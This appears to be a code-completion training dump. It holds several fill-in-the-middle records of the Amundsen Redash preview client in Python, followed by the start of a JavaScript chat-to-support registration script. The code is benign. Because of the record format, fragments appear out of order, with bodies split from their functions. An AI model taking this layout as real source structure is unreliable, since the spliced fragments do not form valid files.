def get_preview_data(self, params: Dict, optionalHeaders: Dict = None) -> FlaskResponse:
"""
Returns a FlaskResponse object, where the response data represents a json object
with the preview data accessible on 'preview_data' key. The preview data should
match amundsen_application.models.preview_data.PreviewDataSchema
"""
LOGGER.debug('Retrieving preview data from Redash with params: %s', params)
try:
query_id = self.get_redash_query_id(params)
if query_id is None:
raise RedashQueryTemplateDoesNotExistForResource('Could not find query for params: %s', params)
# Build headers to use the Query API key or User API key
self._build_headers(params)
query_params = self.build_redash_query_params(params)
query_results, cached_result = self._start_redash_query(query_id=query_id, query_params=query_params)
# Redash attempts to use internal caching. The format of the response
# changes based on whether or not a cached response is returned
if not cached_result:
|
columns = [ColumnItem(c['name'], c['type']) for c in query_results['query_result']['data']['columns']]
preview_data = PreviewData(columns, query_results['query_result']['data']['rows'])
data = PreviewDataSchema().dump(preview_data)
PreviewDataSchema().load(data) # for validation only
payload = jsonify({'preview_data': data})
return make_response(payload, HTTPStatus.OK)
except Exception as e:
LOGGER.error('ERROR getting Redash preview: %s', e)
return make_response(jsonify({'preview_data': {}}), HTTPStatus.INTERNAL_SERVER_ERROR)
def get_feature_preview_data(self, params: Dict, optionalHeaders: Dict = None) -> FlaskResponse:
pass
| query_result_id = self._wait_for_query_finish(job_id=query_results['job']['id'])
query_results = self._get_query_results(query_result_id=query_result_id) | conditional_block |
base_redash_preview_client.py | # Copyright Contributors to the Amundsen project.
# SPDX-License-Identifier: Apache-2.0
import abc
from enum import Enum
import logging
import requests as r
import time
from flask import Response as FlaskResponse, make_response, jsonify
from http import HTTPStatus
from typing import Any, Dict, Optional, Tuple
from amundsen_application.base.base_preview_client import BasePreviewClient
from amundsen_application.models.preview_data import ColumnItem, PreviewData, PreviewDataSchema
LOGGER = logging.getLogger(__name__)
REDASH_SUBMIT_QUERY_ENDPOINT = '{redash_host}/api/queries/{query_id}/results'
REDASH_TRACK_JOB_ENDPOINT = '{redash_host}/api/jobs/{job_id}'
REDASH_QUERY_RESULTS_ENDPOINT = '{redash_host}/api/query_results/{query_result_id}'
class RedashApiKeyNotProvidedException(Exception):
pass
class RedashQueryCouldNotCompleteException(Exception):
pass
class RedashQueryTemplateDoesNotExistForResource(Exception):
pass
class | (Enum):
PENDING = 1 # (waiting to be executed)
STARTED = 2 # (executing)
SUCCESS = 3
FAILURE = 4
CANCELLED = 5
class BaseRedashPreviewClient(BasePreviewClient):
"""
Generic client for using Redash as a preview client backend.
Redash does not allow arbitrary queries to be submitted but it does allow
the creation of templated queries that can be saved and referenced. Amundsen
uses these templated queries to pass in arguments such as the schema name
and table name in order to dynamically build a query on the fly.
The suggested format of the query template is:
select {{ SELECT_FIELDS }}
from {{ SCHEMA_NAME }}.{{ TABLE_NAME }}
{{ WHERE_CLAUSE }}
limit {{ RCD_LIMIT }}
You will need to use the params (e.g. database, cluster, schema and table names)
to idenfiy the specific query ID in Redash to use. This is done via the
`get_redash_query_id` method.
The template values in the Redash query will be filled by the `build_redash_query_params`
function.
"""
def __init__(self, redash_host: str, user_api_key: Optional[str] = None) -> None:
self.redash_host = redash_host
self.user_api_key: Optional[str] = user_api_key
self.headers: Optional[Dict] = None
self.default_query_limit = 50
self.max_redash_cache_age = 86400 # One day
@abc.abstractmethod
def get_redash_query_id(self, params: Dict) -> Optional[int]:
"""
Retrieves the query template that should be executed for the given
source / database / schema / table combination.
Redash Connections are generally unique to the source and database.
For example, Snowflake account that has two databases would require two
separate connections in Redash. This would require at least one query
template per connection.
The query ID can be found in the URL of the query when using the Redash GUI.
:param params: A dictionary of input parameters containing the database,
cluster, schema and tableName
:returns: the ID for the query in Redash. Can be None if one does not exist.
"""
pass # pragma: no cover
def _build_headers(self, params: Dict) -> None:
"""
Generates the headers to use for the API invocation. Attemps to use a
Query API key, if it exists, then falls back to a User API if no
query API key is returned.
Background on Redash API keys: https://redash.io/help/user-guide/integrations-and-api/api
"""
api_key = self._get_query_api_key(params) or self.user_api_key
if api_key is None:
raise RedashApiKeyNotProvidedException('No API key provided')
self.headers = {"Authorization": "Key {}".format(api_key)}
def _get_query_api_key(self, params: Dict) -> Optional[str]:
"""
This function can be overridden by sub classes to look up the specific
API key to use for a given database / cluster / schema / table combination.
"""
return None
def get_select_fields(self, params: Dict) -> str:
"""
Allows customization of the fields in the select clause. This can be used to
return a subset of fields or to apply functions (e.g. to mask data) on a
table by table basis. Defaults to `*` for all fields.
This string should be valid SQL AND fit BETWEEN the brackets `SELECT {} FROM ...`
:param params: A dictionary of input parameters containing the database,
cluster, schema and tableName
:returns: a string corresponding to fields to select in the query
"""
return '*'
def get_where_clause(self, params: Dict) -> str:
"""
Allows customization of the 'WHERE' clause to be provided for each set of parameters
by the client implementation. Defaults to an empty string.
"""
return ''
def build_redash_query_params(self, params: Dict) -> Dict:
"""
Builds a dictionary of parameters that will be injected into the Redash query
template. The keys in this dictionary MUST be a case-sensitive match to the
template names in the Redash query and you MUST have the exact same parameters,
no more, no less.
Override this function to provide custom values.
"""
return {
'parameters': {
'SELECT_FIELDS': self.get_select_fields(params),
'SCHEMA_NAME': params.get('schema'),
'TABLE_NAME': params.get('tableName'),
'WHERE_CLAUSE': self.get_where_clause(params),
'RCD_LIMIT': str(self.default_query_limit)
},
'max_age': self.max_redash_cache_age
}
def _start_redash_query(self, query_id: int, query_params: Dict) -> Tuple[Any, bool]:
"""
Starts a query in Redash. Returns a job ID that can be used to poll for
the job status.
:param query_id: The ID of the query in the Redash system. This can
be retrieved by viewing the URL for your query template in the
Redash GUI.
:param query_params: A dictionary of parameters to inject into the
corresponding query's template
:return: A tuple of the response object and boolean. The response object
changes based off of whether or not the result from Redash came from
the cache.
The boolean is True if the result came from the Redash cache, otherwise False.
"""
url_inputs = {'redash_host': self.redash_host, 'query_id': query_id}
query_url = REDASH_SUBMIT_QUERY_ENDPOINT.format(**url_inputs)
resp = r.post(query_url, json=query_params, headers=self.headers)
resp_json = resp.json()
LOGGER.debug('Response from redash query: %s', resp_json)
# When submitting a query, Redash can return 2 distinct payloads. One if the
# query result has been cached by Redash and one if the query was submitted
# to be executed. The 'job' object is returned if the query is not cached.
if 'job' in resp_json:
redash_cached = False
else:
redash_cached = True
return resp_json, redash_cached
def _wait_for_query_finish(self, job_id: str, max_wait: int = 60) -> str:
"""
Waits for the query to finish and validates that a successful response is returned.
:param job_id: the ID for the job executing the query
:return: a query result ID tha can be used to fetch the results
"""
url_inputs = {'redash_host': self.redash_host, 'job_id': job_id}
query_url = REDASH_TRACK_JOB_ENDPOINT.format(**url_inputs)
query_result_id: Optional[str] = None
max_time = time.time() + max_wait
while time.time() < max_time:
resp = r.get(query_url, headers=self.headers)
resp_json = resp.json()
LOGGER.debug('Received response from Redash job %s: %s', job_id, resp_json)
job_info = resp_json['job']
job_status = RedashApiResponse(job_info['status'])
if job_status == RedashApiResponse.SUCCESS:
query_result_id = job_info['query_result_id']
break
elif job_status == RedashApiResponse.FAILURE:
raise RedashQueryCouldNotCompleteException(job_info['error'])
time.sleep(.5)
if query_result_id is None:
raise RedashQueryCouldNotCompleteException('Query execution took too long')
return query_result_id
def _get_query_results(self, query_result_id: str) -> Dict:
"""
Retrieves query results from a successful query run
:param query_result_id: ID returned by Redash after a successful query execution
:return: A Redash response dictionary
"""
url_inputs = {'redash_host': self.redash_host, 'query_result_id': query_result_id}
results_url = REDASH_QUERY_RESULTS_ENDPOINT.format(**url_inputs)
resp = r.get(results_url, headers=self.headers)
return resp.json()
def get_preview_data(self, params: Dict, optionalHeaders: Dict = None) -> FlaskResponse:
"""
Returns a FlaskResponse object, where the response data represents a json object
with the preview data accessible on 'preview_data' key. The preview data should
match amundsen_application.models.preview_data.PreviewDataSchema
"""
LOGGER.debug('Retrieving preview data from Redash with params: %s', params)
try:
query_id = self.get_redash_query_id(params)
if query_id is None:
raise RedashQueryTemplateDoesNotExistForResource('Could not find query for params: %s', params)
# Build headers to use the Query API key or User API key
self._build_headers(params)
query_params = self.build_redash_query_params(params)
query_results, cached_result = self._start_redash_query(query_id=query_id, query_params=query_params)
# Redash attempts to use internal caching. The format of the response
# changes based on whether or not a cached response is returned
if not cached_result:
query_result_id = self._wait_for_query_finish(job_id=query_results['job']['id'])
query_results = self._get_query_results(query_result_id=query_result_id)
columns = [ColumnItem(c['name'], c['type']) for c in query_results['query_result']['data']['columns']]
preview_data = PreviewData(columns, query_results['query_result']['data']['rows'])
data = PreviewDataSchema().dump(preview_data)
PreviewDataSchema().load(data) # for validation only
payload = jsonify({'preview_data': data})
return make_response(payload, HTTPStatus.OK)
except Exception as e:
LOGGER.error('ERROR getting Redash preview: %s', e)
return make_response(jsonify({'preview_data': {}}), HTTPStatus.INTERNAL_SERVER_ERROR)
def get_feature_preview_data(self, params: Dict, optionalHeaders: Dict = None) -> FlaskResponse:
pass
| RedashApiResponse | identifier_name |
base_redash_preview_client.py | # Copyright Contributors to the Amundsen project.
# SPDX-License-Identifier: Apache-2.0
import abc
from enum import Enum
import logging
import requests as r
import time
from flask import Response as FlaskResponse, make_response, jsonify
from http import HTTPStatus
from typing import Any, Dict, Optional, Tuple
from amundsen_application.base.base_preview_client import BasePreviewClient
from amundsen_application.models.preview_data import ColumnItem, PreviewData, PreviewDataSchema
LOGGER = logging.getLogger(__name__)
REDASH_SUBMIT_QUERY_ENDPOINT = '{redash_host}/api/queries/{query_id}/results'
REDASH_TRACK_JOB_ENDPOINT = '{redash_host}/api/jobs/{job_id}'
REDASH_QUERY_RESULTS_ENDPOINT = '{redash_host}/api/query_results/{query_result_id}'
class RedashApiKeyNotProvidedException(Exception):
pass
class RedashQueryCouldNotCompleteException(Exception):
pass
class RedashQueryTemplateDoesNotExistForResource(Exception):
pass
class RedashApiResponse(Enum):
PENDING = 1 # (waiting to be executed)
STARTED = 2 # (executing)
SUCCESS = 3
FAILURE = 4
CANCELLED = 5
class BaseRedashPreviewClient(BasePreviewClient):
"""
Generic client for using Redash as a preview client backend.
Redash does not allow arbitrary queries to be submitted but it does allow
the creation of templated queries that can be saved and referenced. Amundsen
uses these templated queries to pass in arguments such as the schema name
and table name in order to dynamically build a query on the fly.
The suggested format of the query template is:
select {{ SELECT_FIELDS }}
from {{ SCHEMA_NAME }}.{{ TABLE_NAME }}
{{ WHERE_CLAUSE }}
limit {{ RCD_LIMIT }}
You will need to use the params (e.g. database, cluster, schema and table names)
to idenfiy the specific query ID in Redash to use. This is done via the
`get_redash_query_id` method. | def __init__(self, redash_host: str, user_api_key: Optional[str] = None) -> None:
self.redash_host = redash_host
self.user_api_key: Optional[str] = user_api_key
self.headers: Optional[Dict] = None
self.default_query_limit = 50
self.max_redash_cache_age = 86400 # One day
@abc.abstractmethod
def get_redash_query_id(self, params: Dict) -> Optional[int]:
"""
Retrieves the query template that should be executed for the given
source / database / schema / table combination.
Redash Connections are generally unique to the source and database.
For example, Snowflake account that has two databases would require two
separate connections in Redash. This would require at least one query
template per connection.
The query ID can be found in the URL of the query when using the Redash GUI.
:param params: A dictionary of input parameters containing the database,
cluster, schema and tableName
:returns: the ID for the query in Redash. Can be None if one does not exist.
"""
pass # pragma: no cover
def _build_headers(self, params: Dict) -> None:
"""
Generates the headers to use for the API invocation. Attemps to use a
Query API key, if it exists, then falls back to a User API if no
query API key is returned.
Background on Redash API keys: https://redash.io/help/user-guide/integrations-and-api/api
"""
api_key = self._get_query_api_key(params) or self.user_api_key
if api_key is None:
raise RedashApiKeyNotProvidedException('No API key provided')
self.headers = {"Authorization": "Key {}".format(api_key)}
def _get_query_api_key(self, params: Dict) -> Optional[str]:
"""
This function can be overridden by sub classes to look up the specific
API key to use for a given database / cluster / schema / table combination.
"""
return None
def get_select_fields(self, params: Dict) -> str:
"""
Allows customization of the fields in the select clause. This can be used to
return a subset of fields or to apply functions (e.g. to mask data) on a
table by table basis. Defaults to `*` for all fields.
This string should be valid SQL AND fit BETWEEN the brackets `SELECT {} FROM ...`
:param params: A dictionary of input parameters containing the database,
cluster, schema and tableName
:returns: a string corresponding to fields to select in the query
"""
return '*'
def get_where_clause(self, params: Dict) -> str:
"""
Allows customization of the 'WHERE' clause to be provided for each set of parameters
by the client implementation. Defaults to an empty string.
"""
return ''
def build_redash_query_params(self, params: Dict) -> Dict:
"""
Builds a dictionary of parameters that will be injected into the Redash query
template. The keys in this dictionary MUST be a case-sensitive match to the
template names in the Redash query and you MUST have the exact same parameters,
no more, no less.
Override this function to provide custom values.
"""
return {
'parameters': {
'SELECT_FIELDS': self.get_select_fields(params),
'SCHEMA_NAME': params.get('schema'),
'TABLE_NAME': params.get('tableName'),
'WHERE_CLAUSE': self.get_where_clause(params),
'RCD_LIMIT': str(self.default_query_limit)
},
'max_age': self.max_redash_cache_age
}
def _start_redash_query(self, query_id: int, query_params: Dict) -> Tuple[Any, bool]:
"""
Starts a query in Redash. Returns a job ID that can be used to poll for
the job status.
:param query_id: The ID of the query in the Redash system. This can
be retrieved by viewing the URL for your query template in the
Redash GUI.
:param query_params: A dictionary of parameters to inject into the
corresponding query's template
:return: A tuple of the response object and boolean. The response object
changes based off of whether or not the result from Redash came from
the cache.
The boolean is True if the result came from the Redash cache, otherwise False.
"""
url_inputs = {'redash_host': self.redash_host, 'query_id': query_id}
query_url = REDASH_SUBMIT_QUERY_ENDPOINT.format(**url_inputs)
resp = r.post(query_url, json=query_params, headers=self.headers)
resp_json = resp.json()
LOGGER.debug('Response from redash query: %s', resp_json)
# When submitting a query, Redash can return 2 distinct payloads. One if the
# query result has been cached by Redash and one if the query was submitted
# to be executed. The 'job' object is returned if the query is not cached.
if 'job' in resp_json:
redash_cached = False
else:
redash_cached = True
return resp_json, redash_cached
def _wait_for_query_finish(self, job_id: str, max_wait: int = 60) -> str:
"""
Waits for the query to finish and validates that a successful response is returned.
:param job_id: the ID for the job executing the query
:return: a query result ID tha can be used to fetch the results
"""
url_inputs = {'redash_host': self.redash_host, 'job_id': job_id}
query_url = REDASH_TRACK_JOB_ENDPOINT.format(**url_inputs)
query_result_id: Optional[str] = None
max_time = time.time() + max_wait
while time.time() < max_time:
resp = r.get(query_url, headers=self.headers)
resp_json = resp.json()
LOGGER.debug('Received response from Redash job %s: %s', job_id, resp_json)
job_info = resp_json['job']
job_status = RedashApiResponse(job_info['status'])
if job_status == RedashApiResponse.SUCCESS:
query_result_id = job_info['query_result_id']
break
elif job_status == RedashApiResponse.FAILURE:
raise RedashQueryCouldNotCompleteException(job_info['error'])
time.sleep(.5)
if query_result_id is None:
raise RedashQueryCouldNotCompleteException('Query execution took too long')
return query_result_id
def _get_query_results(self, query_result_id: str) -> Dict:
"""
Retrieves query results from a successful query run
:param query_result_id: ID returned by Redash after a successful query execution
:return: A Redash response dictionary
"""
url_inputs = {'redash_host': self.redash_host, 'query_result_id': query_result_id}
results_url = REDASH_QUERY_RESULTS_ENDPOINT.format(**url_inputs)
resp = r.get(results_url, headers=self.headers)
return resp.json()
def get_preview_data(self, params: Dict, optionalHeaders: Dict = None) -> FlaskResponse:
"""
Returns a FlaskResponse object, where the response data represents a json object
with the preview data accessible on 'preview_data' key. The preview data should
match amundsen_application.models.preview_data.PreviewDataSchema
"""
LOGGER.debug('Retrieving preview data from Redash with params: %s', params)
try:
query_id = self.get_redash_query_id(params)
if query_id is None:
raise RedashQueryTemplateDoesNotExistForResource('Could not find query for params: %s', params)
# Build headers to use the Query API key or User API key
self._build_headers(params)
query_params = self.build_redash_query_params(params)
query_results, cached_result = self._start_redash_query(query_id=query_id, query_params=query_params)
# Redash attempts to use internal caching. The format of the response
# changes based on whether or not a cached response is returned
if not cached_result:
query_result_id = self._wait_for_query_finish(job_id=query_results['job']['id'])
query_results = self._get_query_results(query_result_id=query_result_id)
columns = [ColumnItem(c['name'], c['type']) for c in query_results['query_result']['data']['columns']]
preview_data = PreviewData(columns, query_results['query_result']['data']['rows'])
data = PreviewDataSchema().dump(preview_data)
PreviewDataSchema().load(data) # for validation only
payload = jsonify({'preview_data': data})
return make_response(payload, HTTPStatus.OK)
except Exception as e:
LOGGER.error('ERROR getting Redash preview: %s', e)
return make_response(jsonify({'preview_data': {}}), HTTPStatus.INTERNAL_SERVER_ERROR)
def get_feature_preview_data(self, params: Dict, optionalHeaders: Dict = None) -> FlaskResponse:
pass |
The template values in the Redash query will be filled by the `build_redash_query_params`
function.
"""
| random_line_split |
base_redash_preview_client.py | # Copyright Contributors to the Amundsen project.
# SPDX-License-Identifier: Apache-2.0
import abc
from enum import Enum
import logging
import requests as r
import time
from flask import Response as FlaskResponse, make_response, jsonify
from http import HTTPStatus
from typing import Any, Dict, Optional, Tuple
from amundsen_application.base.base_preview_client import BasePreviewClient
from amundsen_application.models.preview_data import ColumnItem, PreviewData, PreviewDataSchema
LOGGER = logging.getLogger(__name__)
REDASH_SUBMIT_QUERY_ENDPOINT = '{redash_host}/api/queries/{query_id}/results'
REDASH_TRACK_JOB_ENDPOINT = '{redash_host}/api/jobs/{job_id}'
REDASH_QUERY_RESULTS_ENDPOINT = '{redash_host}/api/query_results/{query_result_id}'
class RedashApiKeyNotProvidedException(Exception):
pass
class RedashQueryCouldNotCompleteException(Exception):
pass
class RedashQueryTemplateDoesNotExistForResource(Exception):
pass
class RedashApiResponse(Enum):
PENDING = 1 # (waiting to be executed)
STARTED = 2 # (executing)
SUCCESS = 3
FAILURE = 4
CANCELLED = 5
class BaseRedashPreviewClient(BasePreviewClient):
"""
Generic client for using Redash as a preview client backend.
Redash does not allow arbitrary queries to be submitted but it does allow
the creation of templated queries that can be saved and referenced. Amundsen
uses these templated queries to pass in arguments such as the schema name
and table name in order to dynamically build a query on the fly.
The suggested format of the query template is:
select {{ SELECT_FIELDS }}
from {{ SCHEMA_NAME }}.{{ TABLE_NAME }}
{{ WHERE_CLAUSE }}
limit {{ RCD_LIMIT }}
You will need to use the params (e.g. database, cluster, schema and table names)
to idenfiy the specific query ID in Redash to use. This is done via the
`get_redash_query_id` method.
The template values in the Redash query will be filled by the `build_redash_query_params`
function.
"""
def __init__(self, redash_host: str, user_api_key: Optional[str] = None) -> None:
self.redash_host = redash_host
self.user_api_key: Optional[str] = user_api_key
self.headers: Optional[Dict] = None
self.default_query_limit = 50
self.max_redash_cache_age = 86400 # One day
@abc.abstractmethod
def get_redash_query_id(self, params: Dict) -> Optional[int]:
"""
Retrieves the query template that should be executed for the given
source / database / schema / table combination.
Redash Connections are generally unique to the source and database.
For example, Snowflake account that has two databases would require two
separate connections in Redash. This would require at least one query
template per connection.
The query ID can be found in the URL of the query when using the Redash GUI.
:param params: A dictionary of input parameters containing the database,
cluster, schema and tableName
:returns: the ID for the query in Redash. Can be None if one does not exist.
"""
pass # pragma: no cover
def _build_headers(self, params: Dict) -> None:
"""
Generates the headers to use for the API invocation. Attemps to use a
Query API key, if it exists, then falls back to a User API if no
query API key is returned.
Background on Redash API keys: https://redash.io/help/user-guide/integrations-and-api/api
"""
api_key = self._get_query_api_key(params) or self.user_api_key
if api_key is None:
raise RedashApiKeyNotProvidedException('No API key provided')
self.headers = {"Authorization": "Key {}".format(api_key)}
def _get_query_api_key(self, params: Dict) -> Optional[str]:
"""
This function can be overridden by sub classes to look up the specific
API key to use for a given database / cluster / schema / table combination.
"""
return None
def get_select_fields(self, params: Dict) -> str:
"""
Allows customization of the fields in the select clause. This can be used to
return a subset of fields or to apply functions (e.g. to mask data) on a
table by table basis. Defaults to `*` for all fields.
This string should be valid SQL AND fit BETWEEN the brackets `SELECT {} FROM ...`
:param params: A dictionary of input parameters containing the database,
cluster, schema and tableName
:returns: a string corresponding to fields to select in the query
"""
return '*'
def get_where_clause(self, params: Dict) -> str:
"""
Allows customization of the 'WHERE' clause to be provided for each set of parameters
by the client implementation. Defaults to an empty string.
"""
return ''
def build_redash_query_params(self, params: Dict) -> Dict:
"""
Builds a dictionary of parameters that will be injected into the Redash query
template. The keys in this dictionary MUST be a case-sensitive match to the
template names in the Redash query and you MUST have the exact same parameters,
no more, no less.
Override this function to provide custom values.
"""
return {
'parameters': {
'SELECT_FIELDS': self.get_select_fields(params),
'SCHEMA_NAME': params.get('schema'),
'TABLE_NAME': params.get('tableName'),
'WHERE_CLAUSE': self.get_where_clause(params),
'RCD_LIMIT': str(self.default_query_limit)
},
'max_age': self.max_redash_cache_age
}
def _start_redash_query(self, query_id: int, query_params: Dict) -> Tuple[Any, bool]:
|
def _wait_for_query_finish(self, job_id: str, max_wait: int = 60) -> str:
"""
Waits for the query to finish and validates that a successful response is returned.
:param job_id: the ID for the job executing the query
:return: a query result ID tha can be used to fetch the results
"""
url_inputs = {'redash_host': self.redash_host, 'job_id': job_id}
query_url = REDASH_TRACK_JOB_ENDPOINT.format(**url_inputs)
query_result_id: Optional[str] = None
max_time = time.time() + max_wait
while time.time() < max_time:
resp = r.get(query_url, headers=self.headers)
resp_json = resp.json()
LOGGER.debug('Received response from Redash job %s: %s', job_id, resp_json)
job_info = resp_json['job']
job_status = RedashApiResponse(job_info['status'])
if job_status == RedashApiResponse.SUCCESS:
query_result_id = job_info['query_result_id']
break
elif job_status == RedashApiResponse.FAILURE:
raise RedashQueryCouldNotCompleteException(job_info['error'])
time.sleep(.5)
if query_result_id is None:
raise RedashQueryCouldNotCompleteException('Query execution took too long')
return query_result_id
def _get_query_results(self, query_result_id: str) -> Dict:
"""
Retrieves query results from a successful query run
:param query_result_id: ID returned by Redash after a successful query execution
:return: A Redash response dictionary
"""
url_inputs = {'redash_host': self.redash_host, 'query_result_id': query_result_id}
results_url = REDASH_QUERY_RESULTS_ENDPOINT.format(**url_inputs)
resp = r.get(results_url, headers=self.headers)
return resp.json()
def get_preview_data(self, params: Dict, optionalHeaders: Dict = None) -> FlaskResponse:
"""
Returns a FlaskResponse object, where the response data represents a json object
with the preview data accessible on 'preview_data' key. The preview data should
match amundsen_application.models.preview_data.PreviewDataSchema
"""
LOGGER.debug('Retrieving preview data from Redash with params: %s', params)
try:
query_id = self.get_redash_query_id(params)
if query_id is None:
raise RedashQueryTemplateDoesNotExistForResource('Could not find query for params: %s', params)
# Build headers to use the Query API key or User API key
self._build_headers(params)
query_params = self.build_redash_query_params(params)
query_results, cached_result = self._start_redash_query(query_id=query_id, query_params=query_params)
# Redash attempts to use internal caching. The format of the response
# changes based on whether or not a cached response is returned
if not cached_result:
query_result_id = self._wait_for_query_finish(job_id=query_results['job']['id'])
query_results = self._get_query_results(query_result_id=query_result_id)
columns = [ColumnItem(c['name'], c['type']) for c in query_results['query_result']['data']['columns']]
preview_data = PreviewData(columns, query_results['query_result']['data']['rows'])
data = PreviewDataSchema().dump(preview_data)
PreviewDataSchema().load(data) # for validation only
payload = jsonify({'preview_data': data})
return make_response(payload, HTTPStatus.OK)
except Exception as e:
LOGGER.error('ERROR getting Redash preview: %s', e)
return make_response(jsonify({'preview_data': {}}), HTTPStatus.INTERNAL_SERVER_ERROR)
def get_feature_preview_data(self, params: Dict, optionalHeaders: Dict = None) -> FlaskResponse:
pass
| """
Starts a query in Redash. Returns a job ID that can be used to poll for
the job status.
:param query_id: The ID of the query in the Redash system. This can
be retrieved by viewing the URL for your query template in the
Redash GUI.
:param query_params: A dictionary of parameters to inject into the
corresponding query's template
:return: A tuple of the response object and boolean. The response object
changes based off of whether or not the result from Redash came from
the cache.
The boolean is True if the result came from the Redash cache, otherwise False.
"""
url_inputs = {'redash_host': self.redash_host, 'query_id': query_id}
query_url = REDASH_SUBMIT_QUERY_ENDPOINT.format(**url_inputs)
resp = r.post(query_url, json=query_params, headers=self.headers)
resp_json = resp.json()
LOGGER.debug('Response from redash query: %s', resp_json)
# When submitting a query, Redash can return 2 distinct payloads. One if the
# query result has been cached by Redash and one if the query was submitted
# to be executed. The 'job' object is returned if the query is not cached.
if 'job' in resp_json:
redash_cached = False
else:
redash_cached = True
return resp_json, redash_cached | identifier_body |
p-register-xsell-from-chat.js | $(function() {
/* Setup.
Disable pushing states, b/c we don't support backwards navigation, i.e. we
don't re-enable the Next button, to keep things simple.
The initial pushing of the #getstarted state still happens before we can
disable it. */
webutils.pushStateFragment = $.noop;
var elements = {
root: $('.reg-xsell-from-chat'),
/* Payloads for both account creation and eloqua are made by searching for
inputs within `form.reg`. Any of them will do. */
extraInputsParent: $('form.reg').first(),
subdomainContainer: $('.domain'),
passwordContainer: $('.password-row'),
nextButton: $('.reg-xsell-from-chat-next')
};
var shownClass = 'reg-xsell-from-chat-shown';
/* Data will be pushed from zopim. */
var chatAccount;
var currentStep = -1;
/* Behaviors of the Next button at each step. */
var nextButtonHandlers = [
function() {
var input = elements.subdomainContainer.find('input');
function isValid() {
return input.is('.set') &&
Number(elements.subdomainContainer.find('label.error').css('opacity')) === 0 &&
Number(elements.subdomainContainer.find('label.suggested').css('opacity')) === 0;
}
function toNextStep() {
swapNextButtonHandler();
$('.domain-ping').hide();
elements.subdomainContainer.removeClass(shownClass);
elements.passwordContainer.addClass(shownClass);
}
triggerNextActionOnValidatedUserInput(input, isValid, toNextStep);
},
function() {
var input = elements.passwordContainer.find('input');
function isValid() {
return !elements.passwordContainer.is('.error') &&
input.is('.set') &&
Number(elements.passwordContainer.find('label.error').css('opacity')) === 0;
}
triggerNextActionOnValidatedUserInput(input, isValid, createAccount);
}
];
function swapNextButtonHandler() {
++currentStep;
elements.nextButton
.off('click')
.on('click', nextButtonHandlers[currentStep]);
}
function triggerNextActionOnValidatedUserInput(input, isValid, nextAction) {
var initVal = input.val();
if (isValid()) | else {
/* Just in case validation hasn't happened yet or the input was never
focused on by the user at all (eg auto-populated by browser), force
trigger validation.
`isValid` is expected to return false when validation hasn't happened
yet. */
input.trigger('blur');
disableNextButtonTillValidated(isValid, function() {
var currVal = input.val();
/* If the value that is now finally valid is different from the original
invalid value when user tried to trigger the next action, then do not
automatically trigger the next action but force the user to trigger
it again.
Eg when subdomain validation picks a different value, or when user
corrects the password and blurs from the input, give user a chance to
think about this new value, and force user to click on the Next button
again. */
if (initVal != currVal) {
return;
}
nextAction();
});
}
}
function disableNextButtonTillValidated(isValid, whenValid) {
var intervalId;
function toggleDisable(disable) {
elements.nextButton
.prop('disabled', disable)
.toggleClass('btn-disabled', disable);
}
toggleDisable(true);
intervalId = setInterval(function() {
if (isValid()) {
clearInterval(intervalId);
whenValid();
toggleDisable(false);
}
}, 300);
}
function createAccount() {
var subdomainInputName = 'account[subdomain]';
var subdomainInput, subdomain;
toggleLoading(true, 'loading-creating');
/* Turn off further validation on subdomain while clearbit changes the value
and we override it back. */
subdomainInput = findInputElm(subdomainInputName)
.off('keypress keyup keydown focus blur');
/* Need to keep subdomain b/c it'll be overridden by clearbit. */
subdomain = subdomainInput.val();
/* Populate inputs to pass validation, so clearbit can run. */
encodeChatAccountInDom();
/* Hack this fn again, this time as a callback for clearbit completion. */
webutils.pushStateFragment = function() {
webutils.pushStateFragment = $.noop;
/* Encode again to override clearbit. */
encodeChatAccountInDom();
setInputValue(subdomainInputName, subdomain);
/* Hack. Prevent redirecting on current window. Also conveniently use it to
attach a callback. */
webutils.redirect = handleAccountCreationSuccess;
window.handleAccountCreationFailure = handleAccountCreationFailure;
/* Prob not needed since we took validation off subdomain, but just in case. */
$('.domain-ping').hide();
/* Note, this implements a retry logic (but is disabled atm). */
$('.create-account').trigger('click');
};
/* Call clearbit. This is the earliest opportunity we have to do so.
Validation must pass for all inputs within .step-1, which contains
password and email. Password was filled in our 2nd step, and email was
filled by `encodeChatAccountInDom`. */
$('.step li.error').removeClass('error');
$('.step-1 a.next').trigger('click');
}
/* The underlying implementation for account creation reads DOM to construct
payload, so we have to dump a representation of agents into DOM first.
The inputs can be children of any `form.reg`.
number_employees is not available for older accounts.
owner_phone is not available.
currency is not available.
(But leave the logic for population here anyway. Defaults are used to pass
valiation.) */
function encodeChatAccountInDom() {
setInputValue('owner[email]', chatAccount.owner_email);
encodeCompanyName();
setInputValue('account[help_desk_size]', chatAccount.number_employees || '1-9');
setInputValue('owner[name]', chatAccount.owner_name);
setInputValue('address[phone]', chatAccount.owner_phone || '000-000-0000');
encodeLanguage();
encodeCurrency();
toggleEncodeAgents();
encodeEloqua();
}
/* Pick the first non-empty value among those [
provided by zopim,
detected by clearbit which should already be encoded in dom,
email host
]. */
function encodeCompanyName() {
var name = 'account[name]';
function emailHost(email) {
return email.match(/@(.+)\./)[1];
}
if (chatAccount.company_name) {
setInputValue(name, chatAccount.company_name);
} else if (!findInputElm(name).val()) {
setInputValue(name, emailHost(chatAccount.owner_email));
}
}
/* Attr `name=language` is changed to `name=account[language]` if using fast
creation; let jquery find either.
When setting <select>'s `value`, if it's not support by one of the <option>
elements, then the `value` would be null. Then, the value would be defaulted
to US English by Classic.
To avoid this defaulting, set iff there is a match; otherwise, defer to the
existing code which infers it from `location.host`.
The list of Chat's language codes is at
https://github.com/zopim/meshim-frontend/blob/master/src/meshim/dashboard/controllers/Language.js */
function encodeLanguage() {
var select = findInputElm('language').add(findInputElm('account[language]'));
var options = select.children('option');
var code = chatAccount.language.replace(/_/, '-').toLowerCase();
var isCodeValid = hasOption(code);
function hasOption(val) {
return options.filter(function() {
return this.value === val;
}).length;
}
if (!isCodeValid) {
code = code.replace(/-.*/, '');
isCodeValid = hasOption(code);
}
if (isCodeValid) {
setInputValue('language', code);
setInputValue('account[language]', code);
}
}
/* Supported values are the case-insensitive versions of the `CurrencyType`
constants in
https://github.com/zendesk/zendesk_types/blob/master/lib/zendesk/types.rb
Other values including the empty value is defaulted to 'USD' by Classic.
To avoid this defaulting, set iff value is supported; otherwise, defer to the
existing code which infers it from `location.host`. */
function encodeCurrency() {
if (!chatAccount.currency) {
return;
}
var currency = chatAccount.currency.toUpperCase();
if (['USD','EUR','GBP','JPY'].indexOf(currency) >= 0) {
setInputValue('account[currency]', currency);
}
}
function toggleEncodeAgents() {
var className = 'reg-xsell-from-chat-agent';
